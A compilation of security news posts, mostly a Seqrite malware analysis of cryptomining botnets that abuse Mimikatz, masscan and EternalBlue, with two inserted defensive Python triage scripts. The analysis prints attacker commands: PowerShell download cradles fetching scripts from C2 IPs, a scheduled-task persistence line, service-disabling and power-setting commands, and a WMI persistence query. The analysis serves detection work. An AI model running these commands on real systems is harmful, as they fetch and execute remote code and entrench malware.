It was recently discovered that Google’s Assistant, released last year, keeps a log of all online purchases for which a receipt was sent to the user’s Gmail account. The “Payments” page on a user’s Google account shows transactions, flight and hotel reservations, and other purchases made up to several years prior, even showing the cost, date, and time of the purchase.

Forbes Joins List of Magecart Victims

It was revealed late last week that Forbes had fallen victim to a Magecart attack possibly affecting anyone who made a purchase on the site during that time. Fortunately, the researcher who discovered the attack quickly notified both Forbes and the domain owner, resulting in a swift removal of the malicious payment card skimmer from the highly-trafficked site. It’s likely that Forbes became a victim after another vendor in their supply chain was compromised.

Australian IT Contractor Arrested for Cryptomining

An IT contractor working in Australia was arrested after being caught running cryptomining software on government-owned computers, which netted him over $9,000 in cryptocurrency. The charges encompass misuse of government systems by making modifications to critical functions and security measures for personal gain while in a position of trust. By making these changes, this contractor could have exposed a much larger portion of the network to malicious actors who take advantage of misconfigured settings to access company data.

The post Cyber News Rundown: Banking Trojan Closes Ohio Schools appeared first on Webroot Blog.

Fake Cryptocurrency Scammed 55,000 investors for over $200 million

A cryptocurrency pyramid scheme has been shut down after more than 55,000 investors were conned out of more than $200 million. Brazilian police arrested 10 people suspected of operating the R$850 million (approx. $210 million) scheme, local media including Correio do Povo reported on May 21st.

As part of Operation Egypto, a crackdown on unauthorized financial schemes, the Brazilian tax authorities together with the police moved against the figures behind the operation, which had raised funds from 55,000 investors.

They attracted victims with the promise of a 15% payment the first month after investing in the crypto scheme.

In total, the investigation involved 13 individuals and five legal entities.

“The problem with this company is that it was acting without the authorization,” Correio do Povo quotes federal police delegate Eduardo Dalmolin Boliis of the Office of Corruption and Financial Crimes as saying.

As with a traditional financial pyramid, the seizure of the assets of those involved showed that the company could not have honored all of its investors' withdrawals at the same time.

They also put the money into luxury goods, including 30 cars and gems, which were subsequently confiscated.

The news comes in the same week that the United States acted against a Ponzi scheme linked to a cryptocurrency allegedly backed by diamonds. In that case, the operators are alleged to have persuaded domestic and foreign customers to spend about $30 million over several years.

The use of cryptocurrency is not illegal in Brazil; the police's grounds for the raid rest on the company operating without authorization, not on the cryptocurrency itself.


The post Fake Cryptocurrency Scammed 55,000 investors for over $200 million appeared first on .

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 saw a large decline in malware infections, and in particular far fewer ransomware cases than in 2017. The European country of almost 5 million people mirrors the global trend: cybercriminals are shifting from disruptive and destructive ransomware to silent but very profitable phishing and cryptojacking. Ireland recorded a monthly infection rate of just 1.26% in 2018, one of the lowest in Europe and globally.

This is a sharp contrast to 2017, when millions of computers worldwide were infected by ransomware, most notably WannaCry and NotPetya. Cryptojacking is easy to deploy and hard to detect, because the miner is simply a program that consumes CPU/GPU resources like any other program on the device. The difference is that the consumed resources produce no output useful to the user; they are spent computing hashes in an attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To make matters worse, Microsoft noted that many private and public entities in the country lack adequate staff training in cybersecurity. These vulnerable organisations also practise lax IT security procedures, which lets a small incident escalate quickly.


The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware


WhatsApp Exploited to Install Spyware through Calls

A serious flaw has been discovered in the messaging app WhatsApp that would allow an attacker to install spyware on a victim’s device by manipulating the packets being sent during the call. Further disguising the attack, the malicious software could be installed without the victim answering the call, and with access to the device the attacker could also delete the call log. Fortunately, the Facebook-owned app was quick to respond and quickly released an update for affected versions. 

SIM Swapping Group Officially Charged

Nine men in their teens and 20s have been arrested and charged for a SIM-swapping operation that netted the group over $2 million in stolen cryptocurrency. The group operated by illicitly gaining access to phone accounts by having the phone swapped to a SIM card in their control. The group would then fraudulently access cryptocurrency accounts by bypassing 2-factor authentication, since login codes were sent to devices under their control. Three of the group were former telecom employees with access to the systems needed to execute the scam.

Web Trust Seal Injected with Keylogger

A recent announcement revealed that the “Trust Seal” scripts that Best of the Web provides to highly rated websites were compromised and modified to capture keystrokes from site visitors. While Best of the Web was quick to resolve the issue, at least 100 sites are still loading the compromised seals. This type of supply chain attack has grown in popularity recently: since the beginning of the year, attackers have been injecting payment-stealing scripts into several large online retailers' websites.

Fast Retailing Data Breach

The online vendor Fast Retailing is currently investigating a data breach that gave attackers full access to nearly half a million customer accounts for two of the brand’s online stores. The attack took place within the last three weeks and targeted payment information with names and addresses for customers of UNIQLO Japan and GU Japan. Fast Retailing has since forced a password reset for all online customers and delivered emails with further information for those affected by the attack.

Data Leak in Linksys Routers

Last week researchers discovered a flaw in over 25,000 Linksys routers that could give attackers access to not only the device’s MAC address, but also device names and other critical settings that could compromise the security of anyone using the router. Additionally, by identifying the device’s IP address, attackers could even use geolocation to gauge the approximate location of the exploited device, all without authentication.

The post Cyber News Rundown: WhatsApp Vulnerability Could Install Spyware appeared first on Webroot Blog.

Smashing Security #128: Shackled ankles, photo scrapes, and SIM card swaps

A bad software update causes big headaches for Dutch police, but brings temporary freedom to criminals. SIM swaps are in the news again as fraudsters steal millions. And does your cloud photo storage service have a dirty little secret?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Rip Off Britain’s David McClelland.

This Week in Security News: BEC Attacks and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the prevalence and impact of BEC attacks. Also, find out how botnet malware can perform remote code execution, DDoS attacks and cryptocurrency mining.

Read on:

Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers

Trend Micro discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. 

Cybersecurity Pros Could Work for Multiple Agencies Under Bill Passed by Senate

Skilled federal cybersecurity workers could be rotated among civilian agencies under bipartisan legislation the Senate passed to help fill specific gaps in the workforce. 

New Cybersecurity Report Warns CIOs — ‘If You’re Breached Or Hacked, It’s Your Own Fault’

A new cybersecurity survey conducted by endpoint management specialists 1E and technology market researchers Vanson Bourne questioned 600 IT operations and IT security decision-makers across the U.S. and U.K. and found that 60% of the organizations had been breached in the last two years and 31% had been breached more than once.

AESDDoS Botnet Malware Exploits CVE-2019-3396 to Perform Remote Code Execution, DDoS Attacks, and Cryptocurrency Mining

Trend Micro’s honeypot sensors detected an AESDDoS botnet malware variant exploiting a server-side template injection vulnerability in a collaboration software program used by DevOps professionals. 

U.K. Prime Minister Theresa May Fires Defense Secretary Gavin Williamson Over Huawei Leak

British Prime Minister Theresa May fired Defense Secretary Gavin Williamson, saying he leaked sensitive information surrounding a review into the use of equipment from China’s Huawei Technologies Co. in the U.K.’s telecoms network. 

This Hacker Is Selling Dangerous Windows 0-Day Hacks For Past 3 Years

A report by ZDNet has revealed that a mysterious hacker has been selling Windows zero-day exploits to some of the world's most notorious cybercrime groups for the past three years. At least three cyber-espionage groups, also known as Advanced Persistent Threats (APTs), are regular customers of this hacker.

Docker Hub Repository Suffers Data Breach, 190,000 Users Potentially Affected

In an email sent to their customers on April 26, Docker reported that the online repository of their popular container platform suffered a data breach that affected 190,000 users. 

IC3: BEC Cost Organizations US$1.2 Billion in 2018

In the recently published 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), the agency states that in 2018 alone, it received 20,373 BEC/email account compromise (EAC) complaints that racked up a total of over US$1.2 billion in adjusted losses. 

Trend Forward Capital’s First Startup Pitch Competition in Dallas

Trend Forward Capital, in a partnership with Veem, is bringing its Forward Thinker Award and pitch competition to Dallas on May 20. 

BEC Scammers Steal US$1.75 Million From an Ohio Church

The Saint Ambrose Catholic Parish in Brunswick, Ohio was the victim of a BEC attack when cybercriminals gained access to employee email accounts and used them to trick other members of the organization into wiring the payments into a fraudulent bank account. 

Cybersecurity Experts Share Tips And Insights For World Password Day

May 2 is World Password Day. World Password Day falls on the first Thursday in May each year and is intended to raise awareness of password best practices and the need for strong passwords. 

Confluence Vulnerability Opens Door to GandCrab

A vulnerability in a popular devops tool could leave companies with a dose of ransomware to go with their organizational agility, according to researchers at Trend Micro and Alert Logic.

Were you surprised by the amount of business email compromise complaints the FBI received in 2018? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: BEC Attacks and Botnet Malware appeared first on .

High Value Cryptocurrency Stolen by Hackers


Hackers Breach Private Keys to Steal Cryptocurrency

A likely coding error left at least 732 unique Ethereum private keys improperly secured, allowing attackers to compromise them. By exploiting this weakness, attackers have so far stolen 38,000 Ether, worth over $54 million, though the current figure is likely much higher. While uncommon, such attacks show that the industry's security and key-generation standards have plenty of room for improvement.

Prominent Malware Reverse Engineer Faces Jail Time

The malware researcher Marcus Hutchins, who successfully reversed and stopped the WannaCry ransomware attacks in 2017, is facing up to six years of jail time for prior malware creation and distribution. Hutchins’ charges all tie back to his involvement in the creation of Kronos, a widespread banking Trojan that’s caused significant damage around the world.

Data Exposed for Thousands of Rehab Patients

Personally identifiable data belonging to nearly 145,000 patients of a Pennsylvania rehab facility has been found in a publicly accessible database. Through a Shodan search, researchers discovered the database, which contained roughly 4.9 million unique documents with information ranging from names and birthdays to the specific medical services provided and billing records, all of which could be used to steal the identities of these individuals.

Study Finds Password Security Still Lacking

After this year’s review of password security it may come as no surprise that the top five passwords still in use are simple and have remained at the top for some time. Using a list generated from past data breaches, researchers found the password “123456” was used over 23 million times, with similar variations rounding out the top five. Several popular names, sports teams, and bands like blink182 and Metallica are still in use for hundreds of thousands of accounts. While these passwords may be easy to remember, they are exceedingly simple to guess. Stronger passwords should include multiple words or numbers to increase the complexity.

Bodybuilding Site Breached through Phishing Campaign

The website bodybuilding.com has announced it was the victim of a data breach stemming from an email phishing campaign in July 2018 that could affect many of the site's customers. Fortunately, the site does not store full payment card data, and the data it does store is kept only at the customer's request, leaving little for attackers to use. The site has also forced a password reset for all users and issued a warning about suspicious emails purporting to come from bodybuilding.com, noting they may be part of another phishing campaign.

The post High Value Cryptocurrency Stolen by Hackers appeared first on Webroot Blog.

Miners snatching open source tools to strengthen their malevolent power!


Over the past year, Quick Heal Security Labs has observed a rise in the number of mining malware samples. One way to earn cryptocurrency is to mine it, and cryptocurrency-mining malware has become a popular choice for cybercriminals because it is easy to deploy and pays back immediately. Such miners reach victims through a variety of delivery techniques. Rather than write their own modules from scratch, attackers download original open source software and modify it slightly.

In this blog post, we look at a couple of cases where the attack is built on top of these open source tools, and at how the trend of abusing open source tools to build new malware helps malware authors.

The trend is observed especially in cryptojacking cases. Although cryptojacking is a direct source of income for cybercriminals, information stolen from victims' systems can yield additional money. So these open source tools are used for many purposes: downloader frameworks, information stealing, crypto-mining, DNS changing, the Mirai bot and more. Together they help form a botnet of similar hosts that produces more hashes per second. Such tools are readily available on GitHub and similar platforms, and can be classified as exploit frameworks, vulnerability scanners, password stealers, privilege escalators, evaders, and so on.


Infection vector:

We received a miner downloader which fetches the multiple components of the attack. The script may reach a system through spam mail, malicious URLs, bundled free software or any other conventional method used by malware. We also suspect that a PowerShell script is the initial culprit. The behaviour of the miner is somewhat recursive, so we could not confirm its initial trace on the system.


Technical Analysis:

Fig. 1 Working of miner

The miner downloader creates a file named 'xpdown.dat' which contains the IP addresses of the C2 servers from which it downloads further components:

45.58.135.106
103.95.28.54
103.213.246.23
74.222.14.61
Ok.xmr6b.ru

It then downloads the following files from the C2:

hxxp://45.58.135.106/xpdown.dat
hxxp://45.58.135.106/down.html
hxxp://45.58.135.106/ok/64.html

64.html contains the IP address (174.128.248.10) from which the CPU miner is downloaded.

hxxp://45.58.135.106/kill.txt

kill.txt contains the following list of processes to kill if they are running on the victim machine:

lsmose.exe
lsmos.exe
conime.exe
lsmosee.exe
1.exe
lsazs.exe
tasksche.exe
Zationa.exe
csrs.exe
shennong.bat
svshpst.exe
Spoolvs.exe
svchsot.exe
xmrig.exe
srvany.exe
WinSCV.exe
csrswz.exe
seser.exe
severxxs.exe
mssecsvc.exe
mssecsvr.exe
dsbws.exe


The malware then downloads a text file listing the multiple payloads to be fetched:

hxxp://45.58.135.106/down.txt

down.txt contains the following links (the drop location on the victim is in parentheses). The malware also opens TCP port 32381 on the system.

hxxp://213.183.45.201/downs.exe              (C:\windows\system\downs.exe)
hxxp://66.117.6.174/ups.rar                         (C:\windows\system\cab.exe)
hxxp://213.183.60.7/b.exe                            (C:\windows\inf\msief.exe)
hxxp://174.128.239.250/item.dll                 (C:\windows\debug\item.dat)

Looking at the links in the file, we observed the following.

downs.exe is a modified version of Microsoft's CACLS utility (which displays and modifies access control lists). ups.rar is saved as cab.exe; this component is a downloader for the Windows variant of the Mirai botnet. It also acts as a DNS changer and opens a backdoor on the system. On execution it performs several operations, including changing the host's DNS entry to the IP 223.5.5.5, which is geolocated in China with the ISP listed as “Hangzhou Alibaba Advertising Co.,Ltd.”

 

Fig. 2 Window Server Check

 

It then checks whether the compromised machine is a Windows server by calling GetVersionExA. If it is, it downloads update.txt from the C2 server and drops it at “C:\windows\system\uplist.txt”. uplist.txt lists the following payloads to download and execute:

hxxp://66.117.6.174/wpd.jpg                     (C:\windows\system\msinfo.exe)
hxxp://66.117.6.174/my1.html                   (C:\windows\system\my1.bat)

It also downloads npptools.dll, 64npf.sys, npf.sys, nsoak.dat, packet.dll and wpcap.dll, packet-capture libraries that msinfo.exe loads during its execution.

Let’s look into these components one by one.

my1.bat:

Its code is stealthy and evasive, using techniques such as “Squiblydoo”, a PowerShell download cradle and WMI event subscription persistence to run malicious content on infected machines.

The WMI script contains multiple PowerShell scripts.

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139.170/s.txt')

This text file contains another PowerShell downloader as follows:

powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://74.222.1.38/up.txt')

up.txt contains code that collects information about the OS, physical memory and running processes using WMI classes, then downloads the PowerShell version of Mimikatz from GitHub.

It then steals credentials from the compromised machine and uploads them to the FTP server at 192.187.111.66 using hard-coded FTP credentials.

Fig. 3 Victims Data in FTP Server.

Msinfo.exe:

This is essentially a Windows version of the Mirai botnet, as much of its code matches the previously leaked Mirai source. When executed with the command-line parameters “-create” and “-run”, it checks whether the current system's architecture is x86, MIPS, ARM etc. Based on that, it checks for its latest update and downloads it if available.

It performs the following tasks according to an encrypted file downloaded from the C2 server:

  1. Implements a spreading mechanism using blind SQL injection and brute-force techniques based on a cracking library and the hydra tool:
              [Cracker:Telnet] [Cracker:MSSQL] [Cracker:CCTV] [Cracker:MS17010], CrackerWMI, CrackerSSH
  2. Scans ports such as 80, 8000 and 445 using masscan (a very fast open source port scanner that operates similarly to nmap, the popular port scanning tool):
              https://github.com/robertdavidgraham/masscan
  3. Disables specific services by invoking the following command:
              C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc stop netprofm&sc config netprofm start= disabled&sc stop NlaSvc&sc config NlaSvc start=disabled
  4. Performs a network scan: it collects the public/private IP of the system and associated information such as geolocation, then spoofs its own IP against the current system IP and uses masscan to scan other devices.

Through these steps it turns the system into a bot and adds it to the botnet. The code is written in C++ and split across many source files, such as:

CheckUpdate.cpp
Cracker_Inline.cpp
Cracker_Standalone.cpp
CThreadPool.cpp
Logger_Stdout.cpp
Scanner_Tcp_Connect.cpp
Scanner_Tcp_Raw.cpp
cService.cpp
ServerAgent.cpp
Task_Crack_Ipc.cpp
Task_Crack_Mssql.cpp
Task_Crack_Rdp.cpp
Task_Crack_Ssh.cpp
Task_Crack_Telnet.cpp
Task_Crack_Wmi.cpp
Task_Scan.cpp
WPD.cpp

It primarily targets IoT devices running embedded Linux, so it uses BusyBox (a software suite providing UNIX utilities, often called the Swiss Army knife of embedded Linux) to execute remote commands after compromising those devices through the cracking methods above.


VBS/BAT Agent For Download Miner:

First the payload is dropped and executed at the location below on the victim machine.

hxxp://213.183.60.7/b.exe                      ( downloaded at C:\windows\inf\msief.exe)

On execution it drops a VBS file and a batch file at the locations below and runs the VBS file via wscript.exe, which in turn executes the batch file.

C:\Windows\web\c3.bat
C:\Windows\web\n.vbs

The batch file contains a lot of code: it modifies attributes of some folders/files, kills specific processes, deletes files, changes the access control of some folders/files, establishes persistence for multiple payloads via the registry, Task Scheduler and WMI event subscription, and modifies the firewall policy to block ports 445 and 139.

 

Fig. 4 Part of C3.bat code

Two more payloads are downloaded from one of the C2 servers listed in xpdown.dat. The first is a disk-writer DLL dropped in “C:\Windows\debug”; it runs at system start through a Task Scheduler entry added by the batch file above:

schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F

The second is the final payload, the XMRig Monero miner, a 64-bit executable downloaded from hxxp://174.128.248.10/64.rar to “C:\windows\debug\lsmos.exe”.

On execution it unpacks itself and drops three files into the current directory: an executable (lsmose.exe, 64-bit, packed with VMProtect) and two DLLs (xmrstak_cuda_backend.dll and xmrstak_opencl_backend.dll) that the miner needs to run.

In a second, similar case we observed a base64-encoded PowerShell script: a cryptomining malware that hides in a WMI class to evade AV and most security products thanks to this stealthy and unusual feature.

After decoding we get the following code:

Fig. 5 Base64 Decoded script

 

Following is basic workflow of the malware.

Fig. 6 Basic workflow of miner with WMI class

On execution it checks whether the IP/domain hard-coded in the script is alive. If it is, it requests a “banner” and receives the response ‘SCM Event1 Log’.

Fig. 7 Request for “banner” and another PowerShell Payload

After that, the malware queries the ‘__FilterToConsumerBinding’ WMI class with the command below:

$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding))

and then checks whether the result contains ‘SCM Event1 Log’. If not, it downloads and executes in6.ps1 (64-bit) or in3.ps1 (32-bit) via Invoke-Expression (IEX).

 

Fig. 8 Request for powershell script

in6.ps1/in3.ps1:

These scripts consist of two parts: a base64-encoded gzip data stream and obfuscated code. After de-obfuscation the code resembles the initial base64-encoded script, with additional features.

Fig 9 decoded in6.ps1

The encoded gzip contains four files as mentioned below:

  1. ‘mimi’ – Mimikatz, a credential stealer
  2. ‘mon’ – Monero CPU miner
  3. ‘funs’ – a collection of functions, including one to execute a remote DLL via WMI and an EternalBlue vulnerability scanner
  4. ‘sc’ – shellcode to execute on other systems that are vulnerable to EternalBlue, downloading the same payload there

It creates a WMI Class “systemcore_Updater0” under the Namespace “root\default” and adds properties like mimi, mon, funs, sc, ipsu and i17.

Fig 10 Properties of WMI Class “systemcoreUpdater0”

Then it sets the filtername=”SCM Event1 Log Filter” and consumername=”SCM Event1 Log Consumer”

When an attacker uses WMI as a persistence mechanism, instances of __EventFilter, __EventConsumer and __FilterToConsumerBinding have to be created, and an __InstanceCreationEvent is fired.

In this case the attacker uses the following query as the event filter and binds it to the initial base64-encoded script, which then executes roughly every 3 hours:

SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System

Fig 11 Initial PS script hidden in WMI Class
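The binding described above is what a defender would look for when dumping root\subscription. The following triage script is an added example, not code from the Seqrite post: it scores a filter/consumer pair on the traits the post describes (a modification event on a perf-counter class with a long WITHIN interval as a timer, a code-executing consumer, encoded or download-cradle PowerShell in its command line). The two sample bindings are constructed; the malicious one reproduces the query quoted above, the benign one mimics the default "SCM Event Log" binding that the malware's filter name imitates.

```python
"""Triage of WMI permanent event subscriptions.

Added example, not code from the Seqrite post. Scores filter/consumer
bindings the way an analyst would after dumping root\\subscription
(e.g. Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding).
The two bindings at the bottom are constructed for this demonstration.
"""
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Binding:
    filter_name: str
    query: str           # WQL from the __EventFilter
    consumer_class: str  # e.g. CommandLineEventConsumer
    command: str         # CommandLineTemplate (or ScriptText) of the consumer


# Consumer classes that execute attacker-supplied code.
CODE_CONSUMERS = {"commandlineeventconsumer", "activescripteventconsumer"}
# Fragments typical of a PowerShell download cradle.
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression",
                  "iex", "net.webclient", "invoke-webrequest")


def decode_encoded_command(cmd: str) -> str:
    """Return the UTF-16LE text behind -e/-enc/-EncodedCommand, or '' if none."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_binding(b: Binding) -> List[str]:
    """Return human-readable reasons this binding deserves a closer look."""
    reasons = []
    q = " ".join(b.query.split()).lower()
    decoded = decode_encoded_command(b.command)
    text = b.command.lower() + " " + decoded.lower()

    # A modification event on a perf-counter class polled with a long WITHIN
    # interval is WMI's way of saying "run me every N seconds".
    m = re.search(r"within\s+(\d+)", q)
    if m and "__instancemodificationevent" in q and "win32_perfformatteddata" in q:
        reasons.append(f"timer-style trigger on perf counters every {m.group(1)}s")
    if b.consumer_class.lower() in CODE_CONSUMERS:
        reasons.append(f"code-executing consumer: {b.consumer_class}")
    if decoded:
        reasons.append("encoded PowerShell in consumer")
    if any(marker in text for marker in CRADLE_MARKERS):
        reasons.append("download cradle in consumer")
    return reasons


# Constructed samples (not from the post's telemetry). The cradle URL is a
# documentation address, not a real C2.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s.txt')"
ENC = base64.b64encode(CRADLE.encode("utf-16-le")).decode()

BENIGN = Binding(
    filter_name="SCM Event Log Filter",        # Windows' own default binding
    query="select * from MSFT_SCMEventLogEvent",
    consumer_class="NTEventLogEventConsumer",
    command="",
)
MALICIOUS = Binding(
    filter_name="SCM Event1 Log Filter",       # one character away from the real one
    query=("SELECT * FROM __InstanceModificationEvent WITHIN 10600 "
           "WHERE TargetInstance ISA Win32_PerfFormattedData_PerfOS_System"),
    consumer_class="CommandLineEventConsumer",
    command=f"powershell.exe -NoP -W Hidden -EncodedCommand {ENC}",
)

if __name__ == "__main__":
    for b in (BENIGN, MALICIOUS):
        print(b.filter_name, "->", triage_binding(b) or ["nothing suspicious"])
```

The check deliberately decodes -EncodedCommand before looking for cradle markers, because the encoded form hides strings like DownloadString from a plain grep; on a real host, feed it the output of a root\Subscription dump rather than the constructed records.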

It also tries to delete the Task Scheduler entry “sysupdater0” and checks for “sysupdater0.bat” in %systemroot%, removing it if present.

It modifies the Windows sleep, hibernate and power plan settings by invoking the following commands:
powercfg /CHANGE -standby-timeout-ac 0
powercfg /CHANGE -hibernate-timeout-ac 0
powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

It removes every object in the __FilterToConsumerBinding class under the “root\subscription” namespace whose filter name does not match “SCM Event0 Log”.

It then kills any process that has an “ESTABLISHED” connection to port 3333, 5555 or 7777.

It lists the PIDs of running PowerShell processes and the system's network connections, then checks for a process with an “ESTABLISHED” connection on port 80, 14444, 14433 or 443. If no such process exists and fewer than 8 PowerShell processes are running, it launches the Monero miner using the “funs” module. It then runs Mimikatz and dumps credentials regardless of whether the miner was launched.
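The same observables the miner uses to police its own turf (established connections to 3333/5555/7777 and to the 14444/14433 pool ports, plus the TCP 32381 listener the downloader opens earlier in this post) are useful to a defender. The script below is an added example, not code from the Seqrite post: it parses netstat -ano style output, maps PIDs to process names and flags the two conditions. The netstat text and PID-to-name map are constructed for the demonstration; the port numbers come from the post.

```python
"""Flag processes talking to mining-pool ports or listening on the backdoor port.

Added example, not code from the Seqrite post. The sample netstat output and
PID map below are constructed; the port lists come from the post.
"""
from typing import Dict, List

POOL_PORTS = {3333, 5555, 7777, 14444, 14433}   # ports the miner itself watches
BACKDOOR_PORTS = {32381}                         # listener opened by the downloader


def parse_netstat(text: str) -> List[dict]:
    """Parse `netstat -ano` style output (Windows column layout) into dicts."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue                        # banner, header and blank lines
        if fields[0] == "TCP":
            proto, local, remote, state, pid = fields[:5]
        else:                               # UDP rows carry no State column
            proto, local, remote, pid = fields[:4]
            state = ""
        rows.append({"proto": proto, "local": local, "remote": remote,
                     "state": state, "pid": int(pid)})
    return rows


def port_of(endpoint: str) -> int:
    """'198.51.100.23:3333' -> 3333; also handles '[::1]:3333'."""
    return int(endpoint.rsplit(":", 1)[1])


def find_suspicious(netstat_text: str, pid_names: Dict[int, str]) -> List[dict]:
    """Return one finding per row matching a pool-port or backdoor-port rule."""
    findings = []
    for row in parse_netstat(netstat_text):
        name = pid_names.get(row["pid"], "?")
        if row["state"] == "ESTABLISHED" and port_of(row["remote"]) in POOL_PORTS:
            findings.append({"pid": row["pid"], "process": name,
                             "endpoint": row["remote"],
                             "reason": f"established connection to pool port {port_of(row['remote'])}"})
        elif row["state"] == "LISTENING" and port_of(row["local"]) in BACKDOOR_PORTS:
            findings.append({"pid": row["pid"], "process": name,
                             "endpoint": row["local"],
                             "reason": f"listening on backdoor port {port_of(row['local'])}"})
    return findings


# Constructed sample: what `netstat -ano` prints on the infected host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49712         203.0.113.7:443        ESTABLISHED     1184
  TCP    10.0.0.5:49801         198.51.100.23:3333     ESTABLISHED     4412
  TCP    10.0.0.5:49802         198.51.100.23:14444    SYN_SENT        4412
  TCP    0.0.0.0:32381          0.0.0.0:0              LISTENING       2208
  UDP    0.0.0.0:5353           *:*                                    1432
"""
# Constructed PID map, as `tasklist` would give it.
SAMPLE_PIDS = {1184: "chrome.exe", 4412: "powershell.exe",
               2208: "cab.exe", 1432: "svchost.exe"}

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_NETSTAT, SAMPLE_PIDS):
        print(f)
```

Only ESTABLISHED rows count for the pool-port rule, so a half-open SYN_SENT to 14444 (as in the sample) is not reported; if you want to catch beaconing that never completes, relax that condition but expect more noise from legitimate software using those ports.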

It also enumerates network addresses, checks which IPs are live and stores them in the ‘ipsu’ property. It then scans those IPs for systems vulnerable to MS17-010 (with the EternalBlue scanner script), stores them in the ‘i17’ property and finally executes the shellcode, which downloads ze3.ps1 or ze6.ps1 (identical to in3.ps1/in6.ps1) depending on the OS architecture.

Fig 12 Shell code executed by invoking “WinExec”

The shellcode downloads and executes the PS script on the newly compromised host, so the infection spreads laterally and every reachable vulnerable system on the network ends up mining as well.

In both cases, open source tools are abused heavily to carry out the attack: Mimikatz, masscan and the EternalBlue vulnerability scanner appear to be popular among malware authors, and the same techniques are used to spread ransomware. Seqrite detects such attacks at multiple detection layers.


Indicators of Compromise (SHA-256):

790C213E1227ADEFD2D564217DE86AC9FE660946E1240B5415C55770A951ABFD
46BC86CFF88521671E70EDBBADBC17590305C8F91169F777635E8F529AC21044
AE161E582DE9EC380B3E0B295EFFD62EB8889AC35BC6631A9492CF41563ED14A
0E91F531A05C70B6CF3A8FA942B91A026A5B57069AA5B5C8DFE1EBCBC63AEAE9
EAEF82223EEB8CF404A1D46613D36B9E582304B215201B5E557DB578DD73E04E
30CDBB5C9E23758E8C74E9FDBAEE893D67D3BA42B3B09196CF98395738A67F56
7EC433DD0454553B09F11C39944E251E3EE32E4981F52F02ADC3011EB0CE6537
EA7CEDE3BCB8AD6A8E9FED3CB34F8E6746D445E2044455261EAD4E5092070408
88D338D9FC1990E3D48CDB7E704E785953271EEAB97F196BBCD0C4D2D76F7DC3
789CBE603582262914191882DEC7E6A6F1D61D062D2BDF21B8892BC5854C6196
9868C6F0F23FB81229E2EF765FF524602244384C420D14FFD5708341D85EF4CE
D256AF525680DF6A6178AD608D1700FE5178AA2F3EFE4A52DBCF7AD7EA524936

 

Subject Matter Expert:

Priyanka Shinde, Goutam Tripathy, Vallabh Chole
Security Labs, Quick Heal Technologies, Ltd.

The post Miners snatching open source tools to strengthen their malevolent power! appeared first on Seqrite Blog.

Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry

cloudbric biterry crypto wallet service security

Cloudbric is pleased to announce it has recently signed an MOU with Bitberry, an easy and safe crypto wallet run by RootOne.

As a subsidiary of Dunamu, the main company behind Korea’s largest cryptocurrency exchange Upbit, RootOne developed the Bitberry mobile app wallet to safeguard the crypto assets of users and to make it easy for users to send payments through phone numbers or email without any need to store private keys.

Currently, Bitberry supports over 30 cryptocurrencies (more coming soon) for storing and sending on its mobile app. Most recently, the global version has been released, with both Android and iOS versions available for download.

Working with reputable companies is critical for Cloudbric in growing its service. Through this partnership, Cloudbric will work with Bitberry on exchanging cyber threat data, specifically fraudulent wallet addresses, for Cloudbric’s soon-to-launch Threat Database.

Cloudbric aims to use this cyber threat intelligence for the development of its security platform and crypto asset protection service. Additionally, we will work together to create a safer crypto wallet service and will make the CLB token available through Bitberry’s platform in the future, enabling the payment of services with CLB.

Cloudbric already provides security to various crypto exchanges and wallet services. As we move forward, the team will continue working in the blockchain security field.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry appeared first on Cloudbric.

Cryptojacking Up 4,000% How You Can Block the Bad Guys

Think about it: in the course of your everyday activities, like grocery shopping or riding public transportation, the human body comes in contact with countless germs. In much the same way, as we go about our digital routines, like shopping, browsing, or watching videos, our devices can pick up malware or malicious JavaScript that runs without any visible sign.

That is why hackers may be using malware or scripts to siphon processing power from your computer, power they need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

